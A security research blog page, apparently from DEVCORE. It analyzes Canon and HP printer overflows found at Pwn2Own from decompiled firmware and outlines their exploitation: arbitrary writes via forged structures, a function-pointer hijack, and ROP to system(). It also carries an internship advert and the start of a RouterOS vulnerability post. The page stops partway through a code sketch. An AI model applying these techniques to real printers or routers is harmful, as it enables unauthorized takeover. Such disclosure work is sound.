    {
      ...
      char nsec_buf[256]; // ------ fixed size on the stack
      ...
      _mdns_packet = (int)mdns_packet;
      p_payloadlen = ppayloadlen;
      p_mdns_header = pmdns_header;
      anwser_cnt = anwser_rr;
      v66 = 0;
      cur_ptr = &mdns_packet->payload[*pinfo];
      v9 = *payload;
      v10 = *payload;
      do
      {
        v11 = v10 == 0;
        if ( v10 )
        {
          v9 = v10;
          v10 = (rrlist *)v10->c;
        }
        else
        {
          v6 = aBnmdnsparseans;
          v10 = 0;
          v67 = 0;
        }
      }
      while ( !v11 );
      while ( (unsigned __int16)*anwser_cnt > v67 )
      {
        ...
        if ...
        type = (unsigned __int16)pname->type;
        if ( type == 28 )
          goto LABEL_36;
        if ...
        if ...
        if ( type != 0x21 )
        {
          if ( type != 47 ) // NSEC
          {
            ...
            goto LABEL_95;
          }
          v62 = 0;
          v63 = 0;
          zeromemory(nsec_buf, 256, v19, v20);
          v47 = bnMdnsMalloc(8);
          rrlist->pname->nsec = v47;
          if ( !v47 )
          {
            bnMdnsFreeRRLIST((int)rrlist);
            v50 = 2720;
    LABEL_76:
            debugprintff(3610, 3, "[bnjr] [%s] <%s:%d> bnMdnsParseAnswers error in malloc(NSEC)\n", "IMP/mdns/common/tcBnMdnsMsg.c", v6, v50);
            return 3;
          }
          maybe_realloc(v47, 8);
          nsec = rrlist->pname->nsec;
          nsec_len = bnMdnsGetDecodedRRNameLen(cur_ptr, *ppayloadlen, (char *)_mdns_packet, &dwbyte);
          if ...
          if ...
          v51 = (_BYTE *)bnMdnsMalloc(nsec_len);
          *(_DWORD *)nsec = v51;
          if ...
          consume_label(cur_ptr, *ppayloadlen, _mdns_packet, v51, nsec_len);
          v52 = dwbyte;
          v53 = &cur_ptr[dwbyte];
          v54 = *ppayloadlen - dwbyte;
          *ppayloadlen = v54;
          v55 = (unsigned __int8)v53[1];
          v56 = (unsigned __int8)*v53;
          nsec_ = v53 + 2;
          *ppayloadlen = v54 - 2;
          v57 = v56 | (v55 << 8);
          nsec_len_ = __rev16(v57);
          if ...
          memcpy((int)nsec_buf, nsec_, nsec_len_, v57); //-------- [1]  stack overflow
          for ( i = 0; i < (int)nsec_len_; ++i )
          {
            if ( nsec_buf[i] )
            {
              for ( j = 0; j < 8; ++j )
              {
                if ( 1 << j == (unsigned __int8)nsec_buf[i] )
                {
                  if ( v62 )
                    v63 = 7 - j + 8 * i;
                  else
                    v62 = 7 - j + 8 * i;
                }
              }
            }
          }
          *(_WORD *)(nsec + 4) = v62;
          ...
        }
        *pinfo = &cur_ptr[-_mdns_packet - 0xC];
        *anwser_cnt -= v66;
        return 0;
      }
    }

When it processes an NSEC (47) record, it copies the data into the local buffer (nsec_buf[256]) without checking the length, as shown at [1] in the code above, which leads to a stack overflow.
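The missing check is small. The Python sketch below shows the kind of validation we would expect before the copy at [1]; it is an illustration under assumptions, not the vendor's fix. Following the decompiled code, it reads the two bytes after the next domain name as one big-endian 16-bit length (in RFC 4034 terms these two octets are the window block number and the bitmap length). The names read_nsec_bitmap and NSEC_BUF_SIZE are hypothetical.

```python
import struct

NSEC_BUF_SIZE = 256  # size of nsec_buf in the decompiled function


def read_nsec_bitmap(rdata: bytes, offset: int) -> bytes:
    """Return the bitmap bytes, rejecting lengths the copy could not hold."""
    if offset + 2 > len(rdata):
        raise ValueError("truncated NSEC record")
    # Two bytes read as a big-endian 16-bit length, as the firmware does.
    (length,) = struct.unpack_from("!H", rdata, offset)
    start = offset + 2
    if length > NSEC_BUF_SIZE:
        raise ValueError("bitmap longer than the destination buffer")
    if start + length > len(rdata):
        raise ValueError("bitmap runs past the end of the packet")
    return rdata[start:start + length]


# A short bitmap is accepted; a 300-byte one is rejected instead of copied.
ok = read_nsec_bitmap(b"\x00\x02\x40\x01", 0)
try:
    read_nsec_bitmap(b"\x01\x2c" + b"A" * 300, 0)
    rejected = False
except ValueError:
    rejected = True
```

Without the first length comparison, any 16-bit value above 256 is copied straight onto the stack, which is the overflow described above.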

Exploitation

The exploitation method is the same as the one we used at Pwn2Own Austin 2021, so we will not repeat it here.

NetBIOS (CVE-2023-0854)

NetBIOS mainly provides the following three services:

  • Name service (NetBIOS-NS) : Port 137/TCP and 137/UDP
  • Datagram distribution service (NetBIOS-DGM) : Port 138/UDP
  • Session service (NetBIOS-SSN) : Port 139/TCP

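Here we will focus on NetBIOS-NS, which also provides name resolution on the local network and is commonly seen on Windows. Its packet format is also based on DNS packets. The details are defined in RFC1002.

The packet format:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3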
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         NAME_TRN_ID           | OPCODE  |   NM_FLAGS  | RCODE |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          QDCOUNT              |           ANCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          NSCOUNT              |           ARCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://datatracker.ietf.org/doc/html/rfc1002)

The query is placed after the header:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   + ------                                                ------- +
   |                            HEADER                             |
   + ------                                                ------- +
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                       QUESTION ENTRIES                        /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                    ANSWER RESOURCE RECORDS                    /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                  AUTHORITY RESOURCE RECORDS                   /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                  ADDITIONAL RESOURCE RECORDS                  /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://datatracker.ietf.org/doc/html/rfc1002)

We only need to focus on the Question Entries field.

Question Section:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                         QUESTION_NAME                         /
   /                                                               /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         QUESTION_TYPE         |        QUESTION_CLASS         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

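A Question Name is made up of multiple labels. As with LLMNR described earlier, each label is a length followed by a string. We will not describe the other fields here; see RFC1002 for details.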
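As an illustration of the label structure, the sketch below builds a QUESTION_NAME the way RFC 1001/1002 describe it: the 16-byte NetBIOS name is expanded to a 32-byte first label (each byte split into two nibbles, each added to 'A'), optionally followed by scope labels and a terminating zero. The function name encode_netbios_name and its parameters are ours, chosen for illustration.

```python
def encode_netbios_name(name: str, suffix: int = 0x00, scope: str = "") -> bytes:
    """Build a NetBIOS-NS question name: 0x20-length first label + scope labels."""
    raw = name.upper().encode("ascii")
    if len(raw) > 15:
        raise ValueError("NetBIOS names are at most 15 characters")
    # Pad to 15 bytes with spaces; the 16th byte is the suffix (service type).
    padded = raw.ljust(15, b" ") + bytes([suffix])
    encoded = bytearray()
    for b in padded:
        encoded.append(ord("A") + (b >> 4))    # high nibble
        encoded.append(ord("A") + (b & 0x0F))  # low nibble
    out = bytes([len(encoded)]) + bytes(encoded)
    # Scope labels are ordinary length-prefixed labels.
    for label in filter(None, scope.split(".")):
        lab = label.encode("ascii")
        out += bytes([len(lab)]) + lab
    return out + b"\x00"


question_name = encode_netbios_name("PRINTER", 0x20, scope="example.lan")
```

The first length byte is always 0x20, which is the value the parser checks for before it walks the remaining labels. The name PRINTER and the scope example.lan are placeholder values.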

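Where is the bug

When the Canon imageCLASS MF743Cdw processes the Question section of a NetBIOS packet, it does not check the length correctly, which leads to a heap overflow.

The vulnerability is in cmNetBiosParseName, and we can trigger it through ndNameProcessExternalMessage.

Let’s briefly analyze the root cause:

When the NetBIOS service on the Canon printer starts, it first initializes netbios_ns_buffer and allocates 0xff bytes for it.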

    int ndNameInit()
    {
      sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c", 0x44ED3194, 97, 0x64u);
      netbios_ns_buffer = calloc(1, 0xFF);
      ...
      return -1;
    }

When a NetBIOS packet arrives on 137/UDP, it is handled by ndNameProcessExternalMessage.

    int __fastcall ndNameProcessExternalMessage(Adapter *a1)
    {
      netbios_header *packet; // r0
      unsigned __int8 *v3; // r6
      int flag; // r0
      int v5; // r5
      int v6; // r0
      int v8; // r4
      char nbname[40]; // [sp+8h] [bp-28h] BYREF

      sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c", 0x44ED31AC, 178, 0x64u);
      packet = (netbios_header *)a1->packet;
      LOWORD(a1->vvv) = LOBYTE(packet->id) | (HIBYTE(packet->id) << 8);
      v3 = cmNetBiosParseName(packet, (unsigned __int8 *)packet->payload, (int)nbname, netbios_ns_buffer, 0xFFu); //---- [1]
      // heap overflow at netbios_ns_buffer
      if ...
      flag = getname_query_flag((netbios_header *)a1->packet);
      v5 = flag;
      if ( flag == 0xA800 )
      {
        v6 = ndInternalNamePositiveRegistration(a1, (int)nbname, (int)v3);
        goto LABEL_17;
      }
      if ( flag > 0xA800 )
      {
        switch ( flag )
        {
          case 0xA801:
            v6 = ndInternalNameNegativeRegistration(a1, (int)nbname);
            goto LABEL_17;
          ...
        }
        goto LABEL_14;
      }
      ...
      ndInternalNameNegativeQuery((int)a1, (int)nbname);
      v6 = ndExternalNameNegativeQuery((int)a1, nbname);
    LABEL_17:
      v8 = v6;
      assset("netcifsnqendapp/IMP/nq/ndnampro.c", 0x44ED31AC, 238, 100);
      return v8;
    }

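At [1] in the code above, cmNetBiosParseName processes the name in the Question section and is given the buffer size. However, it does not check the length correctly, so too much data is copied into netbios_ns_buffer, which leads to a heap overflow.

Let’s take a look at the cmNetBiosParseName function.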

    unsigned __int8 *__fastcall cmNetBiosParseName(netbios_header *netbios_packet, unsigned __int8 *netbios_label, int netbios_name, _BYTE *domain_name, unsigned int maxlen)
    {
      char v5; // r9
      unsigned __int8 *v11; // r0
      _BYTE *v12; // r1
      unsigned int i; // r0
      char v15; // r3
      char v16; // r2
      int v17; // r0
      unsigned __int8 *v18; // r0
      unsigned int v19; // r3
      char *label_; // r0
      unsigned int labellen_; // r4
      unsigned int labellen; // t1
      char *v23; // r5
      unsigned __int8 *next[9]; // [sp+4h] [bp-24h] BYREF
      ...
      if ( *v11 == 0x20 )
      {
        ...
        v17 = *next[0];
        if ( *next[0] )
          v5 = '.';
        else
          *domain_name = 0;
        if ( v17 )
        {
          do
          {
            v18 = resolveLabel(netbios_packet, next);
            labellen = *v18;
            label_ = (char *)(v18 + 1);
            labellen_ = labellen;
            if ( maxlen > labellen )
            {
              memcpy((int)domain_name, label_, labellen_, v19);
              v23 = &domain_name[labellen_];
              maxlen -= labellen_; // ---------- [2]
              // it does not subtract the length of "."
              *v23 = v5;
              domain_name = v23 + 1;
            }
          }
          while ( *next[0] );
          *(domain_name - 1) = 0;
        }
        assset("netcifsnqecorelib/IMP/nq/cmnbname.c", 0x44A86D7C, 634, 100);
        return next[0] + 1;
      }
      else
      {
        logg("netcifsnqecorelib/IMP/nq/cmnbname.c", 0x44A86D7C, 595, 10);
        return 0;
      }
    }

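From this function, we can see that when it processes the domain name, it checks the length against the supplied parameter and inserts a . between labels. However, at [2] it does not account for the length of the . character, so the actual length can exceed the original buffer, which leads to a buffer overflow.

Exploitation

We originally thought we would need to reverse the heap internals in more detail, but luckily we later found a useful structure right after the buffer.

There is a structure after netbios_ns_buffer, which we name nb_info.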

The layout of heap memory:

The structure of nb_info:

    struct nb_info
    {
      int active;
      char nbname[16];
      int x;
      int y;
      short z;
      short src_port;
      short tid;
      short w;
      Adapter *adapter;
      char *ptr;
      int state;
      ...
    }

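This structure mainly stores NetBIOS name information. It also references another structure, which we name Adapter, that mainly stores the connection information for that NetBIOS name.

The structure of Adapter:

    struct Adapter
    {
      int idx;
      _BYTE gap0[16];
      int x;
      int fd_1022;
      int fd_1023;
      int y;
      _WORD src_port;
      _DWORD src_ip;
      int vvv;
      int packet;
      _DWORD recv_bytes;
      char *response_buf;
      _DWORD dword3C;
    };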

With a basic understanding of these structures, we can go back to ndNameProcessExternalMessage. If the flag field in the packet is set to 0xA801, ndInternalNameNegativeRegistration is used to process the NetBIOS name. The result is written to Adapter->responsebuf.

    case 0xA801:
      v6 = ndInternalNameNegativeRegistration(a1, (int)nbname);
      goto LABEL_17;

In ndInternalNameNegativeRegistration:

    int __fastcall ndInternalNameNegativeRegistration(Adapter *adapter, int a2)
    {
      ...
      if ( v8 )
      {
        returnNegativeRegistrationResponse((nb_info *)v6, adapter, 3);
      }
      ...
    }

As long as the condition is met, returnNegativeRegistrationResponse is called to handle the response. In returnNegativeRegistrationResponse:

    int __fastcall returnNegativeRegistrationResponse(nb_info *nbinfo, Adapter *adapter, int a3)
    {
      int v6; // r2
      netbios_header *response_buf; // r5
      int NameWhateverResponse; // r2
      unsigned __int8 v10[20]; // [sp+4h] [bp-2Ch] BYREF
      __int16 v11; // [sp+18h] [bp-18h] BYREF
      int v12; // [sp+1Ah] [bp-16h] BYREF

      maybe_memcpy_s(v10, 0x44ED3100, 20);
      sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndinname.c", 0x44ED30DC, 2349, 0x64u);
      if ...
      v11 = 0;
      sub_40B06FD8(*(_DWORD *)adapter->gap0, &v12);
      response_buf = *(netbios_header **)nbinfo->adapter->responsebuf;
      NameWhateverResponse = ndGenerateNameWhateverResponse(response_buf, nbinfo->name, 0x20u, (char *)&v11, 6u);
      if ( NameWhateverResponse > 0 )
      {
        response_buf->id = nbinfo->id; //------[3]
        response_buf->flag = __rev16(a3 | 0xA800);
        if ( sySendToSocket(nbinfo->adapter->fd_1022, (const char *)response_buf, NameWhateverResponse, v10, (unsigned __int16)nbinfo->src_port) <= 0 )
        {
          logg("netcifsnqendapp/IMP/nq/ndinname.c", 0x44ED30DC, 2392, 10);
          v6 = 2393;
        }
        else
        {
          v6 = 2396;
        }
        goto LABEL_9;
      }
      assset("netcifsnqendapp/IMP/nq/ndinname.c", 0x44ED30DC, 2372, 100);
      return -1;
    }

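We can see that [3] writes nbinfo->id to response_buf->id.

In other words, if we can overwrite the nb_info structure and forge an Adapter, we get an arbitrary memory write. Forging it is simple: we only need a global buffer in which to build the structure. We chose the BJNP session buffer for this.

Once we have the arbitrary write, we can overwrite the SLP function pointer to achieve RCE. The rest of the exploitation is the same as described earlier, so we will not go over it again.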

HP

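Our target this time is the HP Color LaserJet Pro M479fdw printer. It is Linux-based, which makes the analysis much simpler. Under the Web Service there are many cgi programs that provide the various printer operations, all of which run as FastCGI services. You can refer to the nginx config to see which path corresponds to which port and service.

/Sirius/rom/httpmgr_nginx/ledm.conf

/usr/local/bin/slangapp handles scan-related operations and listens on 127.0.0.1:14030.

When we access the /Scan/Jobs path, it is handled by this CGI.

Where is the bug

When the HP printer handles a GET request under /Scan/Jobs, it uses rest_scan_handle_get_request and passes the pathinfo along.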

    int __fastcall rest_scan_handle_get_request(int a1, int a2, char *s1, unsigned __int8 *pathinfo, int pathinfo_len)
    {
      struct httpmgr_fptrtbl **v8; // r0
      int v9; // r1
      int v10; // r2
      struct httpmgr_fptrtbl **v11; // r0
      int v12; // r1
      int result; // r0
      int v14; // r0
      int next_char; // r4
      unsigned __int8 *v16; // r3
      int v17; // r1
      int v18; // t1
      char *v19; // r5
      int v20; // r5
      int v21; // r0
      int v22; // r7
      size_t v23; // r8
      int v24; // r0
      char first_path_info[32]; // [sp+8h] [bp-D8h] BYREF
      char second_path_info[32]; // [sp+28h] [bp-B8h] BYREF
      char pagenumber[152]; // [sp+48h] [bp-98h] BYREF

      if ...
      if ...
      if ( !strncmp(s1, "/Scan/UserReadyToScan", 0x15u) )
      {
        ...
      }
      else
      {
        v14 = strncmp(s1, "/Scan/Jobs", 0xAu);
        if ( v14 )
        {
          ...
        }
        ...
        next_char = *pathinfo;
        if ( (next_char & 0xDF) == 0 )
        {
          first_path_info[0] = 0;
    LABEL_37:
          _DEBUG_syslog("REST_SCAN_DEBUG", 0, 0x411FA215, 400, 0);
          v8 = rest_scan_req_ifc_tbl;
          v9 = a1;
          v10 = 400;
          goto LABEL_6;
        }
        v16 = pathinfo;
        v17 = 0;
        do //------------------------------------------------------ [2]
        {
          if ( next_char != '/' )
            first_path_info[32 * v17 + v14] = next_char;
          v19 = &first_path_info[32 * v17];
          if ( next_char == '/' )
          {
            v20 = 32 * v17++;
            pagenumber[v20 - 64 + v14] = 0;
            v19 = &first_path_info[v20 + 32];
            v14 = 0;
          }
          else
          {
            ++v14;
          }
          v18 = *++v16;
          next_char = v18;
        }
        while ( (v18 & 0xDF) != 0 );
        v19[v14] = 0;
        if ( v17 != 2 || strcmp(second_path_info, "Pages") || dword_5DBC8 != strtol(first_path_info, 0, 10) )
          goto LABEL_37;
        v24 = strtol(pagenumber, 0, 10);
        result = rest_scan_send_scan_data(a1, v24) + 1;
        if ( result )
          rest_scan_vp_thread_created = 1;
        else
          return rest_scan_send_err_reply(a1, 400);
      }
      return result;
    }

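However, when it processes the pathinfo at [2], it does not check the length and copies it directly into the local buffer (first_path_info[32]), which leads to a stack overflow.

Exploitation

We can send a very long request to /Scan/Jobs/ to trigger the vulnerability. There is no Stack Guard and no ASLR, so we can overwrite the return address directly. We only need to use ROP to overwrite the GOT entry of strncmp with system, after which we can execute arbitrary commands through /Copy/{cmd}.

However, in the end this vulnerability collided with another team’s finding.

Summary

Looking at the results from Pwn2Own Austin 2021 to Pwn2Own Toronto 2022, printer security is still easily overlooked. In just one year, the number of teams able to compromise printers increased significantly, and even in the third year, at Pwn2Own Toronto 2023, many teams still found vulnerabilities. Finally, if you use these IoT devices, we recommend turning off unnecessary services, configuring firewalls, and enforcing proper access controls to reduce the chance of being attacked.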

DEVCORE 2024 Fifth Internship Program


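It has been over ten years since DEVCORE was founded. We have stayed focused on providing proactive security services and are committed to finding security risks and vulnerabilities to make the world safer. To keep finding up-and-coming security talent who share our vision, and to help students build sound security awareness and skills, we established the "DEVCORE National Information Security Scholarship" and, in early 2022, launched our first internship program. The results so far have been fruitful and beyond our expectations, and the fourth internship program will wrap up at the end of this January. We are honored to announce that the fifth internship program is about to begin. If you would like to join us and sharpen your security skills, please read the information below carefully and apply by email!

Internship Content

This internship is divided into two groups, Binary and Web. The main content is as follows:

  • Binary: Research-focused. After settling on a research target with your mentor, you will analyze the target’s architecture and perform reverse engineering or code review. This process trains your thinking and helps you identify possible attack surfaces and potential weaknesses. You will also analyze past vulnerabilities and write exploits for them, to understand where past vulnerabilities occurred and experience how real-world vulnerabilities are exploited.
    • Vulnerability discovery and research 70%
    • 1-day development (Exploitation) 30%
  • Web: The mentor will discuss and agree with the student on an internship goal based mainly on the student’s own expectations, and will provide guidance along the way to reach it. The topic can be an in-depth study of new types of vulnerabilities, attack techniques, or open-source software seen in recent years, common weaknesses in a programming language ecosystem, or a demonstration of your technical skills by developing red-team-related tools.
    • Research on vulnerabilities, attack techniques, or tool development 90%
    • Final report and preparation 10%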

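Office Location

13F., No. 32, Sec. 3, Bade Rd., Songshan Dist., Taipei City

Internship Period

  • From March 2024 to the end of July 2024, 5 months in total.
  • Two working days per week, 10:00 – 18:00
    • One fixed afternoon per week, 14:00 - 18:00, you must come to the office to discuss progress
      • This can be adjusted flexibly if you live outside Taipei and New Taipei (but must be the same for everyone in a group)
    • The rest of the time is remote work

Who We Are Looking For

Students with a certain level of security background who can work two days per week.

Expected Number of Openings

  • Binary group: 2~3 people
  • Web group: 2~3 people

Compensation

NT$16,000 per month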

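Requirements and Application Process

Internship Requirements

Binary

  • Basic reverse engineering and debugging skills
    • Able to read assembly and familiar with basic debugger usage
  • Basic exploitation skills
    • Must know exploitation techniques such as stack overflow and ROP
  • Basic scripting language development skills
    • Python, Ruby
  • Ability to analyze large open-source projects
    • Mainly C/C++
  • Basic operating system knowledge
    • For example, knowing the concepts of virtual address and physical address
  • Code Auditing
    • Knowing what kind of code is problematic
      • Buffer Overflow
      • Use After free
      • Race Condition
  • Passion for research and a habit of understanding the essence of technology
  • Nice to have but not required
    • CTF competition experience
    • pwnable.tw score
    • Willingness to share technical knowledge
      • Public technical blog/slides, write-ups, or talks
    • Proficiency in IDA Pro or Ghidra
    • Experience writing 1-day exploits
    • Experience in one of the following
      • Kernel Exploit
      • Windows Exploit
      • Browser Exploit
      • Bug Bounty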

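Web

  • Familiar with the OWASP Web Top 10.
  • Understand all the security topics in the PortSwigger Web Security Academy, or have completed all the labs.
    • Reference link: https://portswigger.net/web-security/all-materials
  • Understand the basic concepts of computer networking.
  • Familiar with the command line, including common or built-in system command tools on Unix-like and Windows operating systems.
  • Familiar with at least one web programming language (e.g. PHP, ASP.NET, JSP) and able to build a complete web service.
  • Familiar with at least one scripting language (e.g. Shell Script, Python, Ruby) and able to use scripts to support research.
  • Debugging skills: able to use a debugger to trace program flow, and able to reproduce and narrow down problems.
  • Able to set up and configure common web servers (e.g. Nginx, Apache) and operating systems (e.g. Linux).
  • A drive to get to the bottom of things.
  • Nice to have but not required
    • Have independently discovered a 0-day vulnerability.
    • Have independently analyzed a known vulnerability and written a 1-day exploit.
    • Have served as a challenge author in a CTF competition and built challenges.
    • Hold an OSCP certificate or a certificate of equivalent level.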

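Application Process

The selection process has two stages:

Stage 1: Written Review

Stage 1 is a written review of the following two items:

  • Résumé
  • Answers to the short-answer questions
    • Question 1: Name three real-world vulnerabilities or attack chains made public between 2021 and 2023 that impressed you the most or that you found interesting, and briefly explain, in your own understanding, the root cause, the exploitation conditions, and the possible impact of each.
    • Question 2: Topics you would like to research during the internship. Propose three specific topics you might choose, and briefly explain why you propose them or what you want to accomplish, for example:
      • Research the ◯◯ open-source software and find a critical weakness that allows RCE.
      • Research AD CS attack techniques and try to discover new attack possibilities or vectors.
      • Research common routers; targets include the AA-123 router and the BB-456 wireless router.
    • Question 3 (required for Binary group applicants): The program is a local server that can be interacted with by browsing a web page. The server runs on a Windows 11 computer.
      • Analyze the provided server and use its features so that, after a user browses a web page, calc.exe pops up directly on Windows 11. Also try to satisfy the following conditions:
        • No warning window may pop up.
        • It must be triggered just by the user browsing the web page, with no additional action.
        • The browser is limited to Chrome or MS Edge
      • Be sure to write down your solving process and submit a write-up. Do your best to solve the challenge. Even if you do not succeed in the end, write down the methods and ideas you tried. This test is evaluated mainly on the write-up.

The submission deadline for this stage is 2024/01/28 23:59. We will decide whether you pass Stage 1 based on your résumé and your answers to the questions, and will reply within 10 working days.

Stage 2: Interview

This stage is a 30~120 minute interview (depending on the needs of each group; you will be notified separately). 2~3 senior colleagues will take part to evaluate whether you have the technical skills and personal qualities required for this internship.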

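Timeline

  • 2024/01/05 - 2024/01/28 Open recruitment; written review deadline
  • 2024/01/29 - 2024/02/22 Interviews
  • Results sent by 2024/02/26; the earlier the interview, the earlier you receive the result
  • 2024/03/04 The fifth internship program starts that week

How to Apply

  • Please send your résumé and your answers to the questions in PDF format to recruiting_intern@devco.re
    • For the résumé format, please refer to the sample (DOCX, PAGES, PDF) and convert it to PDF. If you are confident, you are also free to create a résumé that best presents your abilities.
    • Please send it before 2024/01/28 23:59 (recruitment may close early if all positions are filled)
  • Email subject format: [應徵] position your name (example: [應徵] Web 組實習生 王小美)
  • Please keep the résumé within three pages. It must include at least the following:
    • Basic information
    • Education
    • Internship experience
    • Community activity experience
    • Notable achievements
    • Past security-related research
    • MBTI personality test result (test page)

If you have any questions about applying, please contact us by email only. We apologize for any inconvenience. Thank you for writing to us, and we look forward to having you join us!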

Pwn2Own Toronto 2022 : A 9-year-old bug in MikroTik RouterOS


English Version, Chinese Version

TL;DR

The DEVCORE research team found a 9-year-old WAN bug in RouterOS, MikroTik’s router operating system. Combined with another bug in a Canon printer, it made DEVCORE the first team ever to successfully complete an attack chain in the brand-new SOHO Smashup category of Pwn2Own. DEVCORE also won the title of Master of Pwn at Pwn2Own Toronto 2022.

The vulnerability is in the radvd of RouterOS, which does not check the length of the RDNSS field when processing ICMPv6 packets for IPv6 SLAAC. As a result, an attacker can trigger a buffer overflow by sending two crafted Router Advertisement packets, which allows the attacker to gain full control over the underlying Linux system of the router without logging in and without user interaction. This vulnerability was assigned CVE-2023-32154 with a CVSS score of 7.5.

The vulnerability was reported to MikroTik by ZDI on 2022/12/29 and patched on 2023/05/19. It has been patched in the following RouterOS releases:

  • Long-term Release 6.48.7
  • Stable Release 6.49.8
  • Stable Release 7.10
  • Testing Release 7.10rc6

Pwn2Own SOHO Smashup

Pwn2Own is a series of contests organized by Trend Micro’s Zero Day Initiative (ZDI). ZDI picks popular products as targets in different categories, such as operating systems, browsers, electric cars, industrial control systems, routers, printers, smart speakers, smartphones, NAS, and webcams.

As long as participants can exploit a target without user interaction while the device is in its default state and its software is updated to the latest version, the team receives the corresponding Master of Pwn points and bounty. The team with the most Master of Pwn points wins the contest and earns the title “Master of Pwn.”

Because of the pandemic, working from home or in a SOHO (Small Office/Home Office) has become very common. With that in mind, Pwn2Own Toronto 2022 introduced a special category called SOHO Smashup, in which participants must hack a router from the WAN side and then use the router as a trampoline to attack common household devices on the LAN, such as smart speakers and printers.

Besides carrying the second-highest prize, $100,000 (USD), SOHO Smashup also awards the highest score, 10 points, so if you’re aiming to win, you’ll want to complete this category! We chose MikroTik’s lesser-explored RouterBoard as our router target to avoid bug collisions with other teams (both the bounty and the score are halved when you collide with someone else).

RouterOS

The RouterOS is based on the Linux kernel and it’s also the default operating system of MikroTik’s RouterBoard. It can also be installed on a PC to turn it into a router.

Although RouterOS does use some GPL-licensed software, according to the downloadterms page on MikroTik’s website, you have to pay MikroTik $45 to be sent a CD containing the GPL source. Very interesting.

Fortunately, someone has already uploaded the GPL source to GitHub, although it didn’t help much with reversing RouterOS.

RouterOS v7 and RouterOS v6

There are two versions of RouterOS on the download page of MikroTik’s website: RouterOS v7 and RouterOS v6. They are more like two branches of the RouterOS and share a similar design pattern. Because the default installed version of our target, RB2011UiAS-IN, is RouterOS v6, we focus on that version.

RouterOS does not provide a formal way for users to manipulate the underlying Linux system, and users are trapped in a restricted console with a limited number of commands to manage the router, so there has been a lot of research on how to jailbreak RouterOS.

The binaries on RouterOS use a custom IPC mechanism to communicate with each other, and the IPC uses the “nova message” format to pack messages. From here on, we call this kind of binary a “nova binary.”

Besides, RouterOS has a special attack surface. A user can manage a RouterOS device remotely from a Windows computer with a GUI tool, WinBox, which sends nova messages over TCP. So, if RouterOS fails to validate the privilege of a nova message, an attacker may be able to compromise the router by sending a crafted nova message remotely. This was not a top priority for us, though, because WinBox is unavailable from the WAN by default.

We started by reviewing the CVEs in the past few years. There were 80 CVEs related to RouterOS at that time, of which 28 targeted the router itself in pre-auth scenarios.

Four of the 28 CVEs fit scenarios that are more in line with the Pwn2Own rules, meaning that they could allow an attacker to spawn a shell on the router or log in as admin without user interaction. Three of the four were discovered between 2017 and 2019, and three of the four were discovered “in the wild.” These four vulnerabilities are:

  • CVE-2017-20149: Also known as Chimay-Red, this is one of the vulnerabilities leaked from the CIA’s “Vault 7” in 2017. It occurs when RouterOS parses HTTP requests: if the Content-Length in the HTTP headers is negative, an integer underflow results, which, combined with the Stack Clash attack technique, lets an attacker control the program flow and achieve RCE.
  • CVE-2018-7445: A buffer overflow in the SMB service of RouterOS. It was found by black-box fuzzing and is the only one of the four vulnerabilities that was reported by its discoverer. SMB is not enabled by default, though.
  • CVE-2018-14847: Another of the vulnerabilities leaked from “Vault 7”, which allows an attacker to read arbitrary files. That doesn’t sound like a big problem, but in earlier versions of RouterOS the user’s password was stored in a file as password xor md5(username + "283i4jfkai3389"), so an attacker who can read the file can calculate the admin password.
  • CVE-2021-41987: A heap buffer overflow in the base64 decoding process of the SCEP service, caused by a length miscalculation. The vulnerability was discovered after security researchers analyzed an APT’s exploit on its C2 server.
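
To see why the storage scheme quoted for CVE-2018-14847 offers no real protection, here is a minimal Python sketch of the formula password xor md5(username + "283i4jfkai3389"). The function name is hypothetical, and repeating the 16-byte key for longer passwords is an assumption. The on-disk file layout is not modeled.

```python
import hashlib

SALT = b"283i4jfkai3389"  # constant quoted in the text above


def xor_with_user_key(data: bytes, username: str) -> bytes:
    """XOR data with md5(username + SALT); key repetition is an assumption."""
    key = hashlib.md5(username.encode() + SALT).digest()
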